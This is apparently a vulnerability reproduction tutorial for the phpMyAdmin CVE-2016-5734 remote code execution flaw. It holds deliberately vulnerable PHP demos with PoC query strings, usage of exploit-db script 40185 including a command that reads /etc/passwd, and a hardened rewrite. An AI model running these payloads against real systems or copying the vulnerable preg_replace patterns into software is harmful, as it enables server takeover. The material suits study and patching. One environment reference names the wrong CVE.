Vulnerability description
CVE-2016-5734 is listed on exploit-db as "phpMyAdmin 4.6.2 - Authenticated Remote Code Execution", that is, remote code execution by an authenticated phpMyAdmin user. According to the description, all 4.6.x versions of phpMyAdmin up to 4.6.3 are affected, as are 4.4.x up to 4.4.15.7 and 4.0.x up to 4.0.10.16. The author of the CVE exploits a null-byte handling bug in the preg_replace function of PHP versions before 5.4.7, which allows the injected code to be executed remotely.
Affected versions
- phpMyAdmin 4.6.x (up to 4.6.3)
- phpMyAdmin 4.4.x (up to 4.4.15.7)
- phpMyAdmin 4.0.x (up to 4.0.10.16)
- PHP version: 4.3.0 ~ 5.4.6
Vulnerability environment construction
Use vulhub, which starts the CVE-2018-12613 environment directly with Docker in a single step.
Docker quick start and vulnerability environment construction
After downloading and installing vulhub, enter the /vulhub/phpmyadmin/CVE-2016-5734 directory and execute the following command to start the environment:
sudo docker-compose up -d
After the environment has started, check the ports: the service is mapped to port 8080 on our host.
Visit localhost:8080 in the virtual machine; if the following interface appears, the installation succeeded.
Vulnerability analysis
- First, the preg_replace function: preg_replace performs a regular expression search and replacement.
- Next, the role of the \e modifier of preg_replace: if this deprecated modifier is set, preg_replace() first substitutes backreferences in the replacement string, then evaluates the result as PHP code (as eval does) and uses the return value as the string actually used for the replacement. Single quotes, double quotes, backslashes (\) and NUL characters are escaped with backslashes in the substituted backreferences.
Test code execution using \e:
<?php
highlight_file(__FILE__);
// Pattern, replacement and subject all come straight from the query string.
$raw = $_GET['raw'];
$replace = $_GET['replace'];
$text = $_GET['text'];
// With the /e modifier, $replace is evaluated as PHP code after backreference substitution.
$text = preg_replace('/'.$raw.'/e', $replace, $text);
?>
PoC:
?raw=a&replace=system("ls")&text=larry
If the demo is changed to the following code, is it still vulnerable?
<?php
highlight_file(__FILE__);
$raw = $_GET['raw'];
$replace = $_GET['replace'];
$text = $_GET['text'];
// The modifier is now fixed to /i, but $raw is still concatenated into the pattern unescaped.
$text = preg_replace('/'.$raw.'/i', $replace, $text);
?>
In fact, it can still be bypassed. When the PHP version is below 5.4.7, a NUL byte injected into the pattern truncates it, so the attacker can close the pattern early and supply the e modifier themselves; the replacement string is then executed as PHP code.
PoC:
?raw=a/e%00&replace=system(%22ls%22)&text=larry
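A hardened rewrite of the demo, added here as an example and not part of the original post (it assumes PHP 7 or later for the type declarations). It removes each ingredient the PoC relies on: user-controlled delimiters and modifiers, NUL bytes in the pattern, and a replacement string that preg_replace interprets.

```php
<?php
// Hardened version of the demo above (added example, not code from the original post).

function safe_replace(string $raw, string $replace, string $text): string
{
    // 1. Refuse NUL bytes outright: on PHP < 5.4.7 a NUL in the pattern truncated
    //    the pattern string, so an attacker-supplied "/e" became the modifier set.
    foreach ([$raw, $replace, $text] as $v) {
        if (strpos($v, "\0") !== false) {
            throw new InvalidArgumentException('NUL byte in input refused');
        }
    }

    // 2. Treat the user value as a literal search string: preg_quote() escapes
    //    regex metacharacters and the delimiter, so the caller can never close
    //    the pattern and append modifiers. The modifier set is fixed here.
    $pattern = '/' . preg_quote($raw, '/') . '/i';

    // 3. Use preg_replace_callback() instead of /e: the replacement is returned
    //    as data, never evaluated, and $1 / \1 sequences are not expanded.
    $result = preg_replace_callback($pattern, static function () use ($replace) {
        return $replace;
    }, $text);

    // 4. Fail closed on regex engine errors instead of silently returning null.
    if ($result === null) {
        throw new RuntimeException('preg error code ' . preg_last_error());
    }
    return $result;
}

// Constructed sample inputs, including the PoC values from the post.
echo safe_replace('a', 'b', 'larry'), "\n";            // ordinary literal replacement

try {
    safe_replace("a/e\0", 'system("ls")', 'larry');   // the NUL-byte PoC is refused
} catch (InvalidArgumentException $e) {
    echo 'refused: ', $e->getMessage(), "\n";
}

// Without the NUL byte, "a/e" is matched literally and nothing is evaluated.
echo safe_replace('a/e', 'system("ls")', 'larry'), "\n";
```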
For phpmyadmin code vulnerability analysis, you can view the following article:
https://xz.aliyun.com/t/7836#toc-5
Exploit
Conditions of use: the database account and password must be known.
Download the exploit script:
https://www.exploit-db.com/exploits/40185
Script usage:
-u account
-p password
-c PHP code to execute (uname -a is executed by default)
python 40185.py -u root -p root http://192.168.154.3:8080
python 40185.py -u root -p root -c "system('cat /etc/passwd')" http://192.168.154.3:8080
Vulnerability hardening
Upgrade PHP to 5.4.7 or later, or upgrade phpMyAdmin to a patched version.
Reference links
https://larry.ngrep.me/2016/09/21/cve-2016-5734-analysis/
https://xz.aliyun.com/t/7836